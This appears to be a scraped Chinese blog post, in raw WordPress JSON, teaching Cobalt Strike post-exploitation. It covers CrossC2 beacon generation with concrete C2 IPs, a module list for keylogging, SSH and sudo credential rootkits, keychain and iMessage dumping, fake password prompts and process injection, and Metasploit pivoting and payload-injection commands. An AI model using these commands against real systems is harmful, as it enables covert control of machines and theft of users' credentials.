- \n
- \u540e\u6e17\u900f\u63d2\u4ef6-\u68bc\u674c<\/li>\n
- \u514d\u6740\u63d2\u4ef6-bypassAV<\/li>\n
- \u4e0a\u7ebflinux\u4e3b\u673a-CrossC2<\/li>\n<\/ul>\n
\u4e8c\u3001CS \u4e0a\u7ebf Linux \u4e3b\u673a<\/h1>\n
1.CrossC2 \u4ecb\u7ecd<\/h2>\n
Cross C2 \u9879\u76ee\u662f\u4e00\u4e2a\u53ef\u4ee5\u751f\u6210 Linux\/Mac OS \u7684 Cobaltstrike beacon payload \u7684\u8de8\u5e73\u53f0\u9879\u76ee<\/p>\n
- \n
- Linux & MacOS \u652f\u6301\u65e0\u6587\u4ef6\u843d\u5730\u4ece\u5185\u5b58\u4e2d\u52a0\u8f7d\u6267\u884c\u52a8\u6001\u5e93\u6216\u53ef\u6267\u884c\u6587\u4ef6<\/li>\n
- \u7075\u6d3b\u81ea\u5b9a\u4e49\u6267\u884c\u6587\u4ef6\u7684\u6570\u636e\u8fd4\u56de\u7c7b\u578b\uff0c\u7aef\u53e3\u626b\u63cf\uff0c\u5c4f\u5e55\u622a\u56fe\uff0c\u952e\u76d8\u8bb0\u5f55\uff0c\u53e3\u4ee4\u51ed\u8bc1\u7b49\u7528\u6237\u81ea\u5b9a\u4e49\u5f00 \u53d1\u5b9e\u73b0\u66f4\u4fbf\u6377<\/li>\n
- \u81ea\u5b9a\u4e49\u901a\u4fe1\u534f\u8bae<\/li>\n
- \u652f\u6301\u6a2a\u5411\u79fb\u52a8<\/li>\n
- \u652f\u6301\u4ece\u5185\u5b58\u52a0\u8f7d\u811a\u672c<\/li>\n
- Android & iPhone \u652f\u6301<\/li>\n<\/ul>\n
2.CrossC2 \u4f7f\u7528<\/h2>\n
1\uff09\u521b\u5efa Listener<\/h3>\n
\u9996\u5148\u521b\u5efaListener\u76d1\u542c\u5668 windows\/beacon_https\/reverse_https
\n![\"QQ_1738245238871.png\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n2\uff09\u4e0b\u8f7d beacon_keys \u6587\u4ef6<\/h3>\n
\u4f7f\u7528\u547d\u4ee4<\/p>\n
ls -lha\n<\/code><\/pre>\n\u663e\u793a\u9690\u85cf\u6587\u4ef6<\/p>\n
<\/div>
\n\u7136\u540e\u4e0b\u8f7dteamserver\u76ee\u5f55\u4e0b\u7684 .cobaltstrike.beacon_keys \u6587\u4ef6\u5230\u672c\u5730\u5ba2\u6237\u7aef\u542f\u52a8\u76ee\u5f55
\n\u5982\u679c\u5728\u8fdc\u7a0b\u8fde\u63a5\u5de5\u5177\u4e2d\u65e0\u6cd5\u4e0b\u8f7d\uff0c\u53ef\u4ee5\u4f7f\u7528python\u7684http\u670d\u52a1\u4e0b\u8f7d<\/p>\n3\uff09\u6dfb\u52a0 CNA \u6269\u5c55\u811a\u672c<\/h3>\n
- \n
- \u9009\u62e9 Script Manager\uff0c\u6dfb\u52a0 CrossC2.cna<\/li>\n
- \u6253\u5f00\u4e0b\u8f7d\u7684 CrossC2Kit \u6587\u4ef6\u5939\uff0c\u6dfb\u52a0 CrossC2Kit.cna\u3001CrossC2Kit_Loader.cna , \u5305\u542b\u5185\u5b58\u52a0\u8f7d\u7b49\u5176\u5b83\u6269\u5c55\u529f\u80fd<\/li>\n
- \u5982\u679c\u6210\u529f\u5b89\u88c5\uff0c\u83dc\u5355\u680f\u4f1a\u591a\u51fa\u4e00\u9879 CrossC2
\n<\/div><\/li>\n<\/ul>\n4\uff09\u751f\u6210 Beacon<\/h3>\n
\u9ed8\u8ba4\u4f7f\u7528 cli \u6216 cna \u63d0\u4f9b\u7684 GUI \u529f\u80fd\u751f\u6210 beacon<\/p>\n
\uff081\uff09GUI \u751f\u6210\u6728\u9a6c<\/h4>\n
CrossC2 > Create CrossC2 Listener > Create reverse HTTPS Listener
\n<\/div><\/p>\n<\/div>
\n\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48tcp\u7684payload\u6ca1\u6709Beacon\u56de\u8fde<\/p>\n\uff082\uff09Cli \u751f\u6210\u6728\u9a6c\uff08\u547d\u4ee4\u884c\uff09<\/h4>\n
# \u547d\u4ee4\u683c\u5f0f\n.\/genCrossC2.Win.exe C2\u7684IP\u5730\u5740 C2\u76d1\u542c\u7684\u7aef\u53e3 .cobaltstrike.beacon_keys\u6587\u4ef6\u6240\u5728\u8def\u5f84 null Linux \u751f\u6210payload\u7684\u67b6\u6784 payload\u540d\u79f0\n\n# \u547d\u4ee4\u793a\u4f8b\n.\/genCrossC2.Win.exe 124.71.45.28 443 D:\\MyTools\\CobaltStrike\\cs4.5\\.cobaltstrike.beacon_keys null Linux x64 cc2-test\n<\/code><\/pre>\nLinux \u53ca MacOS \u4e0a\u751f\u6210\u6728\u9a6c\u547d\u4ee4\u540c\u4e0a<\/p>\n
- \n
- \u751f\u6210\u53cd\u5411Payload<\/li>\n<\/ul>\n
# \u547d\u4ee4\u793a\u4f8b\n.\/genCrossC2.Linux 139.155.49.43 444 .cobaltstrike.beacon_keys null Linux x64 c444\n\n# \u547d\u4ee4\u89e3\u91ca\n139.155.49.43\uff1aCS https_listener \u76d1\u542c\u5668IP\n444\uff1aCS https_listener \u76d1\u542c\u5668\u7aef\u53e3\n.cobaltstrike.beacon_keys\uff1aCS\u670d\u52a1\u7aefBeacon key\u6587\u4ef6\nnull\uff1a\u4e0d\u9009\u62e9\u52a8\u6001\u5e93\nLinux\uff1a\u8fd0\u884c\u5e73\u53f0\u4e3aLinux\uff08MacOS \/ Linux \/ MacOS-bind \/ Linux-bind\uff09\nx64\uff1a64\u4f4d\u7cfb\u7edf\uff08x86 \/ x64\uff09\nc444\uff1apayload\u6587\u4ef6\u540d\n<\/code><\/pre>\n- \n
- \u751f\u6210\u6b63\u5411Payload<\/li>\n<\/ul>\n
# \u547d\u4ee4\u793a\u4f8b\n.\/genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux-bind x64 cc\n<\/code><\/pre>\n5\uff09\u8fd0\u884c Beacon<\/h3>\n
- \n
- \u5728\u76ee\u6807\u4e0a\u8fd0\u884c CrossC2 \u63d2\u4ef6\u751f\u6210\u7684\u4e00\u952e\u4e0a\u7ebf\u811a\u672c<\/li>\n
- \u4e0a\u4f20 beacon \u81f3\u76ee\u6807\u673a\u5668\u540e\u8fdb\u884c\u8d4b\u6743\u8fd0\u884c<\/li>\n<\/ul>\n
chmod +x cc2.out\n\n.\/cc2.out\n<\/code><\/pre>\n<\/div><\/p>\n\u6ce8\u610f\uff1acs\u542f\u52a8\u65f6\u4e0d\u9700\u8981\u4f7f\u7528c2.4.9.profile \uff0c\u5426\u5219\u65e0\u6cd5\u8fd4\u56deBeacon<\/p>\n
3.CrossC2 \u57fa\u672c\u4f7f\u7528<\/h2>\n
Command Description\n ------- -----------\n ! \u4ece\u5386\u53f2\u8bb0\u5f55\u4e2d\u8fd0\u884c\u547d\u4ee4\n bash CrossC2 Bash\u811a\u672c-\u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u811a\u672c\n cancel \u53d6\u6d88\u6b63\u5728\u8fdb\u884c\u7684\u4e0b\u8f7d\n cat \u663e\u793a\u6587\u4ef6\u7684\u5185\u5bb9\n cc2_auth CrossC2 \u8eab\u4efd\u9a8c\u8bc1rootkit - \u83b7\u53d6\u8eab\u4efd\u9a8c\u8bc1\u64cd\u4f5c\u7684\u5bc6\u7801\uff08sshd\/sudo\/su\/passwd\u2026\uff09\n cc2_frp CrossC2 frp\u4ee3\u7406 - \u542f\u52a8Linux\/MacOS SOCKS5\u4ee3\u7406\uff5bTCP\/KCP\uff08UDP\uff09\uff5d\n cc2_iMessage_dump CrossC2 iMessage\u8f6c\u50a8-\u4eceiMessage\u8f6c\u50a8\u6d88\u606f\u3002\n cc2_inject CrossC2 \u8fdb\u7a0b\u6ce8\u5165\n cc2_job CrossC2 joblist - \u7ba1\u7406\u6b63\u5728\u8fd0\u884c\u7684\u4efb\u52a1\n cc2_keychain_dump CrossC2 Keychain\u8f6c\u50a8\uff08root\uff09- \u4eceKeychain\u4e2d\u8f6c\u50a8\u767b\u5f55\u7528\u6237\u540d\u548c\u5bc6\u7801\n cc2_keylogger CrossC2 \u952e\u76d8\u8bb0\u5f55\u5668 - \u6536\u542c\u7528\u6237\u4ece\u952e\u76d8\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u3002\n cc2_mimipenguin CrossC2 mimipenguin - \u4ece\u5f53\u524dlinux\u684c\u9762\u8f6c\u50a8\u767b\u5f55\u5bc6\u7801\n cc2_prompt_spoof CrossC2 prompt_spoof -\uff08AppStore\uff09\u754c\u9762\u5f39\u51fa\uff0c\u63d0\u793a\u7528\u6237\u8f93\u5165\u5bc6\u7801\uff0c\u7a83\u53d6\u8f93\u5165\u7684\u5bc6\u7801\n cc2_safari_dump CrossC2 safari\u8f6c\u50a8 - \u4ecesafari\u4e2d\u8f6c\u50a8\u6d4f\u89c8\u5668\u5386\u53f2\u8bb0\u5f55\uff08\u9ed8\u8ba4\u503c\u4e3a500\uff09\u3002\n cc2_script CrossC2 Script - \u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u811a\u672c\n cc2_shellcode CrossC2 \u8fd0\u884cshellcode\n cc2_ssh CrossC2 SSH rootkit - \u83b7\u53d6SSH\u7684\u5bc6\u7801\u4ee5\u767b\u5f55\u5230\u5176\u4ed6\u76ee\u6807\u3002\n cd \u5207\u6362\u76ee\u5f55\n clear \u6e05\u9664\u4efb\u52a1\u961f\u5217\n connect \u901a\u8fc7TCP\u8fde\u63a5\u5230Beacon\n download \u4e0b\u8f7d\u6587\u4ef6\n downloads \u5217\u51fa\u6b63\u5728\u8fdb\u884c\u7684\u6587\u4ef6\u4e0b\u8f7d\n exit \u7ec8\u6b62\u6b64\u4f1a\u8bdd\n getsystem \u5c06uid=0\u4e34\u65f6\u6743\u9650\u7684\u4f1a\u8bdd\u5347\u7ea7\u4e3a\u6839\u4f1a\u8bdd\n head \u6253\u5370\u6587\u4ef6\u7684\u524d10\u884c\n help \u5e2e\u52a9\u83dc\u5355\n history \u663e\u793a\u547d\u4ee4\u5386\u53f2\u8bb0\u5f55\n note \u4e3a\u6b64\u4f1a\u8bdd\u5206\u914d\u5907\u6ce8 \n perl CrossC2 Perl\u811a\u672c - \u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u811a\u672c\n php CrossC2 PHP\u811a\u672c - \u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u811a\u672c\n pwd \u6253\u5370\u5f53\u524d\u76ee\u5f55\n python CrossC2 Python\u811a\u672c - \u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u811a\u672c\n python-import aaa\n\n rportfwd \u8bbe\u7f6e\u53cd\u5411\u7aef\u53e3\u8f6c\u53d1\n rportfwd_local \u901a\u8fc7Cobalt Strike\u5ba2\u6237\u7aef\u8bbe\u7f6e\u53cd\u5411\u7aef\u53e3\n ruby CrossC2 Ruby\u811a\u672c - \u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u811a\u672c\n setenv \u8bbe\u7f6e\u4f1a\u8bdd\u7684\u73af\u5883\u53d8\u91cf\n shell \u901a\u8fc7shell\u6267\u884c\u547d\u4ee4\n sleep \u8bbe\u7f6e\u7236\u4fe1\u6807\u7684\u7761\u7720\u65f6\u95f4\n socks \u542f\u52a8SOCKS4a\u670d\u52a1\u5668\u4ee5\u4e2d\u7ee7\u6d41\u91cf\n socks stop \u505c\u6b62SOCKS4a\u670d\u52a1\u5668\n spawn \u751f\u6210\u65b0\u4f1a\u8bdd\n sudo \u901a\u8fc7sudo\u8fd0\u884c\u547d\u4ee4\n tail \u6253\u5370\u6587\u4ef6\u7684\u6700\u540e10\u884c\n unlink \u65ad\u5f00\u5b50TCP\u7684Beacon\u4f1a\u8bdd\n upload \u4e0a\u4f20\u6587\u4ef6\n<\/code><\/pre>\n\u5bc6\u7801dump\u6a21\u5757\uff1acc2_mimipenguin \u91c7\u7528\u5f00\u6e90\u9879\u76ee MimiPenguin2.0\uff0c\u53c2\u89c1 CrossC2Kit\/mimipenguin\/mimipenguin.cna\n\u8ba4\u8bc1\u540e\u95e8\u6a21\u5757\uff1acc2_auth, cc2_ssh sudo\/su\/passwd\u7b49\u8ba4\u8bc1\u540e\u95e8\uff0cssh\u88ab\u8fde\u63a5\u53ca\u8fde\u63a5\u5176\u4ed6\u4e3b\u673a\u7684\u51ed\u8bc1\u90fd\u5c06\u88ab\u8bb0\u5f55\u3002\n\u4fe1\u606f\u6536\u96c6\u6a21\u5757\uff1acc2_safari_dump, cc2_chrome_dump, cc2_iMessage_dump, cc2_keychain_dump \u5e38\u89c1\u6d4f\u89c8\u5668\u7684\u8bbf\u95ee\u8bb0\u5f55\uff0c\u4ee5\u53caiMessage\u804a\u5929\u5185\u5bb9\u4e0e\u94a5\u5319\u4e32\u4e2d\u4fdd\u5b58\u7684\u8ba4\u8bc1\u51ed\u636e\u90fd\u5c06\u88ab\u83b7\u53d6\u3002\n\u6d41\u91cf\u4ee3\u7406\u6a21\u5757\uff1acc2_frp \u652f\u6301\u5feb\u901fTCP\/KCP(UDP)\u7684\u53cd\u5411socks5\u52a0\u5bc6\u6d41\u91cf\u4ee3\u7406\u3002\n\u952e\u76d8\u8bb0\u5f55\u6a21\u5757\uff1acc2_keylogger \u8bb0\u5f55\u7528\u6237\u7684\u952e\u76d8\u8f93\u5165\u3002\n\u7f51\u7edc\u63a2\u6d4b\u6a21\u5757\uff1acc2_portscan, cc2_serverscan \u8fdb\u884c\u7aef\u53e3\u626b\u63cf\u53ca\u670d\u52a1\u7248\u672c\u626b\u63cf\u3002\n\u6743\u9650\u63d0\u5347\u6a21\u5757\uff1acc2_prompt_spoof \u8bf1\u5bfc\u6b3a\u9a97\u83b7\u53d6\u7528\u6237\u8d26\u6237\u5bc6\u7801\u3002\n\u4efb\u52a1\u7ba1\u7406\u6a21\u5757\uff1acc2_job \u7ba1\u7406\u5185\u5b58\u4e2d\u8fd0\u884c\u7684\u6a21\u5757\u3002\n<\/code><\/pre>\n\u4e09\u3001CS\u8054\u52a8MSF<\/h1>\n
CS\u548cMSF\u5404\u6709\u6240\u957f\uff0cCS \u66f4\u9002\u5408\u4f5c\u4e3a\u7a33\u5b9a\u63a7\u5236\u5e73\u53f0\uff0c MSF \u66f4\u9002\u7528\u4e8e\u4e0e\u5404\u7c7b\u5185\u7f51\u4fe1\u606f\u641c\u96c6\u53ca\u6f0f\u6d1e\u5229\u7528\u3002\u4e3a\u4e86\u53d6\u957f\u8865\u77ed\uff0c\u6211\u4eec\u53ef\u4ee5\u8fdb\u884c\u8054\u52a8\u3002<\/p>\n
1.\u65b9\u6cd5\u4e00\uff1aCS\u7684socks\u4ee3\u7406<\/h2>\n
\u901a\u8fc7 CS \u5185\u7f6e socks \u4ee3\u7406\u5c06\u672c\u5730 MSF \u5e26\u5165\u76ee\u6807\u5185\u7f51\u6267\u884c\u64cd\u4f5c<\/p>\n
\u601d\u8def\uff1a\u5229\u7528 beacon shell \u5728\u76ee\u6807\u673a\u5668\u548c\u56e2\u961f\u670d\u52a1\u5668\u4e4b\u95f4\u5efa\u7acb socks \uff0c\u800c\u540e\u518d\u5728\u672c\u5730\u901a\u8fc7 proxychains \u4e4b\u7c7b\u7684\u4ee3\u7406\u5de5\u5177\u8fde\u5230\u76ee\u6807\u5185\u7f51\u5373\u53ef\u3002<\/p>\n
1\uff09CS \u542f\u52a8 Socks \u4ee3\u7406<\/h3>\n
<\/div><\/p>\n2\uff09\u4f7f\u7528 proxychains \u4ee3\u7406<\/h3>\n
\u672c\u5730 kali \u6216\u8005vps\u7f16\u8f91 \/etc\/proxychains4.conf \u6587\u4ef6\uff0c\u6dfb\u52a0 TeamServer \u670d\u52a1\u5668 ip \uff08\u672c\u5730\u662f127.0.0.1\uff09\u548c socks \u7aef\u53e3\uff0c\u5c31\u53ef\u4ee5\u76f4\u63a5\u8fde\u5230\u76ee\u6807\u5185\u7f51\uff08\u7c7b\u578b\u4e3a socks5\uff09<\/p>\n
# \u7f16\u8f91proxychains\u914d\u7f6e\u6587\u4ef6\nvim \/etc\/proxychains4.conf\n\n# \u5199\u5165\u4ee3\u7406\u5730\u5740\u53ca\u7aef\u53e3\nsocks5 124.71.45.28 6677\n<\/code><\/pre>\n<\/div><\/p>\n\u4f7f\u7528\u547d\u4ee4<\/p>\n
proxychains4 curl 127.0.0.1:8000\n<\/code><\/pre>\n\u4f1a\u8bbf\u95ee\u5230\u5f00\u542fsocks\u7684\u9776\u673a
\n<\/div>
\n<\/div><\/p>\n3\uff09MSF \u8bbe\u7f6e\u4ee3\u7406<\/h3>\n
\u8ba9\u672c\u5730 MSF \u6240\u6709\u6a21\u5757\u7684\u6d41\u91cf\u90fd\u4ece CS \u7684 socks5 \u4ee3\u7406\u8d70
\n<\/div>
\n<\/div>
\n\u6253\u5f00 MSF\uff0c\u6267\u884c\u5168\u5c40\u4ee3\u7406\u8bbe\u7f6e\u547d\u4ee4\uff0c\u5373\u53ef\u8ba9\u672c\u5730 MSF \u6240\u6709\u6a21\u5757\u7684\u6d41\u91cf\u90fd\u8d70 CS \u7684 socks \u4ee3\u7406<\/p>\n2.\u65b9\u6cd5\u4e8c\uff1aCS\u5916\u90e8\u76d1\u542c\u5668<\/h2>\n
1\uff09CS \u4e0a\u521b\u5efa\u4e00\u4e2a http \u7684\u5916\u90e8\u76d1\u542c\u5668\uff08Foreign HTTP\uff09<\/h3>\n
IP\u4e3a\u5f00\u542fmsf\u670d\u52a1\u7684
\n<\/div><\/p>\n2\uff09MSF \u5f00\u542f\u76d1\u542c<\/h3>\n
use exploit\/multi\/handler\nset payload windows\/meterpreter\/reverse_http\nset lhost \uff08\u5185\u90e8ip\u6216\u80050.0.0.0\uff09\nset lport 803\nrun\n<\/code><\/pre>\n3\uff09\u56de\u5230 CS \u4e0a\uff0c\u5728\u4f1a\u8bdd\u5904\u53f3\u952e\uff0c\u9009\u62e9Access\uff0c\u9009\u62e9 spawn<\/h3>\n
<\/div><\/p>\n4\uff09MSF \u5f97\u5230 meterpreter<\/h3>\n
<\/div><\/p>\n\u56db\u3001MSF\u8054\u52a8CS<\/h1>\n
1.\u5728 CS \u5f00\u542f\u4e00\u4e2a\u76d1\u542c\uff08Beacon HTTP\uff09<\/h2>\n
2.\u7528msfvenom\u751f\u6210\u6728\u9a6c<\/h2>\n
<\/div><\/p>\n3.MSF \u76d1\u542c\u4f1a\u8bdd<\/h2>\n
\u4f7f\u7528\u547d\u4ee4<\/p>\n
handler -p windows\/x64\/meterpreter\/reverse_tcp -H 0.0.0.0 -P 6677\n<\/code><\/pre>\n\u4f1a\u5728\u540e\u53f0\u5b9e\u73b0\u76d1\u542c\uff0c\u6267\u884c\u6728\u9a6c\u5f97\u5230 session \u4f1a\u8bdd
\n<\/div><\/p>\n4.MSF \u4e0a\u6267\u884c payload \u6ce8\u5165\u6a21\u5757<\/h2>\n
use exploit\/windows\/local\/payload_inject\nset payload windows\/meterpreter\/reverse_http\nset DisablePayloadHandler true\nset lhost 124.71.45.28 #cobaltstrike\u76d1\u542c\u7684ip\nset lport 801 #cobaltstrike\u76d1\u542c\u7684\u7aef\u53e3\nset session 1 #\u8fd9\u91cc\u662f\u83b7\u5f97\u7684session\u7684id\nrun\n<\/code><\/pre>\nDisablePayloadHandler \u9ed8\u8ba4\u4e3a false\uff0c\u5373 payload_inject \u6a21\u5757\u6267\u884c\u4e4b\u540e\u4f1a\u5728\u672c\u5730\u751f\u6210\u4e00\u4e2a\u65b0 \u7684 handler \u76d1\u542c\u5668\uff0c\u7531\u4e8e\u8bbe\u7f6e\u6267\u884c\u7684 payload \u662f\u53bb\u8fde\u63a5 Cobaltstrike \u7684\u76d1\u542c\u5668\uff0c\u6240\u4ee5\u8fd9\u91cc\u6211\u4eec\u8bbe \u7f6e\u4e3a true\uff0c\u8ba9\u5b83\u4e0d\u518d\u751f\u6210\u65b0\u7684 handler \u76d1\u542c\u5668
\n<\/div>
\n<\/div>
\n\u9ed8\u8ba4\u6ce8\u5165notepad.exe\u8fdb\u7a0b\u4e2d<\/p>\n5.\u8fdb\u884c\u5176\u4ed6\u8fdb\u7a0b\u6ce8\u5165<\/h2>\n
sessions \u5217\u51fa\u4f1a\u8bdd\nsessions 3 \u8fdb\u5165\u4f1a\u8bdd3\nps \u67e5\u770b\u8fdb\u7a0bpid\nbackground \u5c06\u4f1a\u8bdd\u653e\u5165\u540e\u53f0\n<\/code><\/pre>\n<\/div><\/p>\n\u8bbe\u7f6e\u8fdb\u7a0bPID<\/p>\n
set pid 1664\n<\/code><\/pre>\n<\/div><\/p>\n\u6210\u529f\u5c06shellcode\u6ce8\u5165\u76ee\u6807\u8fdb\u7a0b\u83b7\u5f97\u4f1a\u8bdd
\n<\/div><\/p>\n\u6216\u8005\u4f7f\u7528cs\u7684process list\u8fdb\u884c\u6ce8\u5165
\n<\/div><\/p>\n\u6ce8\u610f\uff1ashellcode\u662f\u6ce8\u5165\u5230\u8fdb\u7a0b\u7684\u5185\u5b58\u7a7a\u95f4\u4e2d\uff0c\u8fdb\u7a0b\u88ab\u7ec8\u6b62\uff0c\u90a3\u4e48\u5185\u5b58\u6570\u636e\u5168\u90e8\u4e22\u5931<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u3001CobaltStrike \u6269\u5c55\u811a\u672c 1.\u6269\u5c55\u811a\u672c\u7b80\u4ecb \u6269\u5c55\u662f Cobaltstrike \u4e00\u4e2a\u6781\u4e3a\u91cd\u8981\u7684\u6a21\u5757 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[53,9],"tags":[],"class_list":["post-1713","post","type-post","status-publish","format-standard","hentry","category-53","category-9"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1713"}],"version-history":[{"count":2,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1713\/revisions"}],"predecessor-version":[{"id":1768,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1713\/revisions\/1768"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1713"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
- \u751f\u6210\u6b63\u5411Payload<\/li>\n<\/ul>\n
- \u751f\u6210\u53cd\u5411Payload<\/li>\n<\/ul>\n
![\"QQ_1738245238871.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738245238871.png\")
<\/div><\/p>\n![\"QQ_1738245585328.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738245585328.png\")
<\/div>![\"QQ_1738245836703.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738245836703.png\")
<\/div><\/li>\n<\/ul>\n![\"QQ_1738246111784.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738246111784.png\")
<\/div><\/p>\n![\"QQ_1738304960107.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738304960107.png\")
<\/div>![\"QQ_1738247905523.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738247905523.png\")
<\/div><\/p>\n![\"QQ_1738309409277.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738309409277.png\")
<\/div><\/p>\n![\"QQ_1738314355119.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738314355119.png\")
<\/div><\/p>\n![\"QQ_1738314420213.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738314420213.png\")
<\/div>![\"QQ_1738314545285.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738314545285.png\")
<\/div><\/p>\n![\"QQ_1738314766505.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738314766505.png\")
<\/div>![\"QQ_1738314798636.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738314798636.png\")
<\/div>![\"QQ_1738315092688.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738315092688.png\")
<\/div><\/p>\n![\"QQ_1738316389707.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738316389707.png\")
<\/div><\/p>\n![\"QQ_1738316458566.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738316458566.png\")
<\/div><\/p>\n![\"QQ_1738327663587.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738327663587.png\")
<\/div><\/p>\n![\"QQ_1738327497773.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738327497773.png\")
<\/div><\/p>\n![\"QQ_1738328240738.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738328240738.png\")
<\/div>![\"QQ_1738328272398.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738328272398.png\")
<\/div>![\"QQ_1738328587233.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738328587233.png\")
<\/div><\/p>\n![\"QQ_1738328800020.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738328800020.png\")
<\/div><\/p>\n![\"QQ_1738328892344.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738328892344.png\")
<\/div><\/p>\n![\"QQ_1738329402894.png\"](\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/QQ_1738329402894.png\")
<\/div><\/p>\n